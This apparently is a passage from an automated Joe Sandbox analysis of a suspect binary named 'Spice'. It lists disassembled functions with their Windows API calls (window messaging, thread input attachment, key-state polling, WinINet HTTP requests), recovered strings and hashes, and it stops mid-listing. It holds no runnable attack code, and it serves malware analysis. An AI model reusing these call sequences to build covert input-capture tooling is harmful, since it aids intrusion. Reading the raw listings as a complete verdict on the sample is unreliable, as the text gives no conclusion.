                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E31AE35A00209EFCB10EF64C845EA9B7B8EF44304F15906BE80AF7395EB719942DB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                        • Part of subcall function 00ECB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB7BD
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EC9BCC
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 00EC9BD7
                                                                                                                                                                                                                                      • GetParent.USER32 ref: 00EC9BF3
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC9BF6
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00EC9BFF
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00EC9C1B
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EC9C1E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                                                                                                                                      • Opcode ID: a14e7138fe4a86521a4e6e383afb083180298679c335e5da2fae655281155b72
                                                                                                                                                                                                                                      • Instruction ID: 5bbd4bf3f04688493f4ca73c4dc6d62d5745935a0de7b29ce3dfeaa6529fe326
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a14e7138fe4a86521a4e6e383afb083180298679c335e5da2fae655281155b72
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4121C474900108BBCF04AB60DC89EFEBBB9EF95310F101259F965A32A2DF7658169B20
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                        • Part of subcall function 00ECB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB7BD
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EC9CB5
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 00EC9CC0
                                                                                                                                                                                                                                      • GetParent.USER32 ref: 00EC9CDC
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC9CDF
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00EC9CE8
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00EC9D04
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EC9D07
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 1f5093279aae14459c23e1e2e44b238b003a7a6e36fa21ed9ed562056eb39e0c
                                                                                                                                                                                                                                      • Instruction ID: 807ad82ff3fba806d6c3ddc0d5ecb9a169fafb74a77dc8b85bf1c23a0f218e62
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f5093279aae14459c23e1e2e44b238b003a7a6e36fa21ed9ed562056eb39e0c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F21B375D00108BBDF04AB60CD85FFEBBB9EF94300F100155F955A71A2DF768926AB20
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32 ref: 00EC9D27
                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00EC9D3C
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EC9D4E
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EC9DC9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                      • API String ID: 1704125052-3381328864
                                                                                                                                                                                                                                      • Opcode ID: b25932c979d1262d4373f9a038914806e2b9190b45441ef3efc7fc0bf270fde9
                                                                                                                                                                                                                                      • Instruction ID: 4ae4c17e5e0e63ca5d0e67ded61127bd5bc90fdb2aa6a99f7bc9276f98ed1655
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b25932c979d1262d4373f9a038914806e2b9190b45441ef3efc7fc0bf270fde9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52110A76248316BAFA102620ED0BEE77B9CDF05724F20201AF911B50E2FE67AA526552
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00EE8FC1
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00EE8FEE
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00EE8FF8
                                                                                                                                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00EE90F8
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EE9225
                                                                                                                                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F03BDC), ref: 00EE9259
                                                                                                                                                                                                                                      • CoGetObject.OLE32(?,00000000,00F03BDC,?), ref: 00EE927C
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00EE928F
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EE930F
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EE931F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2395222682-0
                                                                                                                                                                                                                                      • Opcode ID: 1040e5ac020f956ad75875c4ee71d9f9530e2e44f9d1d963e9e57f1be95eaf87
                                                                                                                                                                                                                                      • Instruction ID: 32b6aa00576067a1bf9932c72afb36d7ab8d92ae9fbf17656000ba777650cf98
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1040e5ac020f956ad75875c4ee71d9f9530e2e44f9d1d963e9e57f1be95eaf87
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8C137B1208349AFC704DF65C88496BB7E9FF89348F00591DF989AB262DB71ED05CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00ED19EF
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1A03
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00ED1A0A
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1A19
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ED1A2B
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1A44
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1A56
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1A9B
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1AB0
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1ABB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2156557900-0
                                                                                                                                                                                                                                      • Opcode ID: b280ff5c85efd656be9ba8356e178c1ea7d661dbea41279eea861f88313e0628
                                                                                                                                                                                                                                      • Instruction ID: f39ea66083bfcd22d7d84a9d7d2e48b341c9ea46fabd72a0ecf55cf4e663770f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b280ff5c85efd656be9ba8356e178c1ea7d661dbea41279eea861f88313e0628
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC31BDB1601308BFEB109F24DD48BA977ABEB543A9F104156F800E6290DBB89D429F60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 00E7260D
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 00E72617
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00E7262C
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 00E72634
                                                                                                                                                                                                                                      • GetClientRect.USER32(?), ref: 00EAC0FC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00EAC113
                                                                                                                                                                                                                                      • GetWindowDC.USER32(?), ref: 00EAC11F
                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00EAC12E
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00EAC140
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 00EAC15E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3430376129-0
                                                                                                                                                                                                                                      • Opcode ID: 496e27b715c1f69fe4b07c8faeb04367c8f2dabd38519a2c2f368cfd75fde010
                                                                                                                                                                                                                                      • Instruction ID: 169c9ed5b9f234f6bead96435bcb589b665fb369e954719b9c4cf9b1d1124390
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 496e27b715c1f69fe4b07c8faeb04367c8f2dabd38519a2c2f368cfd75fde010
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82114931500209BFDB616FA4EC08BE97BB2FB19325F144265FA69A50E1CF321991FF11
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E7ADE1
                                                                                                                                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00E7AE80
                                                                                                                                                                                                                                      • UnregisterHotKey.USER32(?), ref: 00E7AFD7
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00EB2F64
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00EB2FC9
                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EB2FF6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                      • String ID: close all
                                                                                                                                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                      • Opcode ID: 0683d1fddc8688d5952d137bf34b274bb951a84803fbc08be6fa2bbeb8f2e46b
                                                                                                                                                                                                                                      • Instruction ID: b08798f51fee492edf57168870583f82e78f333480158ea6a0f0b0afefff31df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0683d1fddc8688d5952d137bf34b274bb951a84803fbc08be6fa2bbeb8f2e46b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2A16D707012128FCB29EF14C495AAAF3A5FF44704F14A2ADE50EBB251DB31AD52CF91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,00ECB13A), ref: 00ECB078
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ChildEnumWindows
                                                                                                                                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                      • API String ID: 3555792229-1603158881
                                                                                                                                                                                                                                      • Opcode ID: 06974a7b4f12022f087b2aeb9adda90da9e3dd738f53bce59b91ea4a4092f2c2
                                                                                                                                                                                                                                      • Instruction ID: a75b91dae434e8ac6f5c8c84ad735da1b156069377da2ad0f8a4803c341b39a1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06974a7b4f12022f087b2aeb9adda90da9e3dd738f53bce59b91ea4a4092f2c2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02917070600119DBCB18EF60C542FEAFBB5BF04308F54A12DE85AB7251DF31699AD7A1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00E7327E
                                                                                                                                                                                                                                        • Part of subcall function 00E7218F: GetClientRect.USER32(?,?), ref: 00E721B8
                                                                                                                                                                                                                                        • Part of subcall function 00E7218F: GetWindowRect.USER32(?,?), ref: 00E721F9
                                                                                                                                                                                                                                        • Part of subcall function 00E7218F: ScreenToClient.USER32(?,?), ref: 00E72221
                                                                                                                                                                                                                                      • GetDC.USER32 ref: 00EAD073
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EAD086
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00EAD094
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00EAD0A9
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00EAD0B1
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EAD13C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                      • Opcode ID: bbfe789867eeb96c2e9dec52a46db044632a7f402573a37d1c731ef1ac78d30e
                                                                                                                                                                                                                                      • Instruction ID: 241d652e977eccbab25f2c3b2254ca1865326f2e6771a2cbc3b10cef1f79faa2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbfe789867eeb96c2e9dec52a46db044632a7f402573a37d1c731ef1ac78d30e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C671E430408209DFCF219F64CC84AEA7BB6FF4E324F149269ED566A1A6C7319D41EF60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3
                                                                                                                                                                                                                                        • Part of subcall function 00E72714: GetCursorPos.USER32(?), ref: 00E72727
                                                                                                                                                                                                                                        • Part of subcall function 00E72714: ScreenToClient.USER32(00F377B0,?), ref: 00E72744
                                                                                                                                                                                                                                        • Part of subcall function 00E72714: GetAsyncKeyState.USER32(00000001), ref: 00E72769
                                                                                                                                                                                                                                        • Part of subcall function 00E72714: GetAsyncKeyState.USER32(00000002), ref: 00E72777
                                                                                                                                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00EFC69C
                                                                                                                                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 00EFC6A2
                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 00EFC6A8
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00EFC752
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EFC765
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00EFC847
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                      • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                      • Opcode ID: daf1e552af52ae726ed045b3c3bea98596905af4d2a49d4d048195a45a44d626
                                                                                                                                                                                                                                      • Instruction ID: c7132b363c653fc57f57ad3860fe62616df8a303d47346b6debb06b4806f15a2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: daf1e552af52ae726ed045b3c3bea98596905af4d2a49d4d048195a45a44d626
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D51BF70108309AFD714EF24CC55FAA77E5FB84314F20851DF699A72E2CB31A945DB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EE211C
                                                                                                                                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EE2148
                                                                                                                                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00EE218A
                                                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EE219F
                                                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EE21AC
                                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00EE21DC
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00EE2223
                                                                                                                                                                                                                                        • Part of subcall function 00EE2B4F: GetLastError.KERNEL32(?,?,00EE1EE3,00000000,00000000,00000001), ref: 00EE2B64
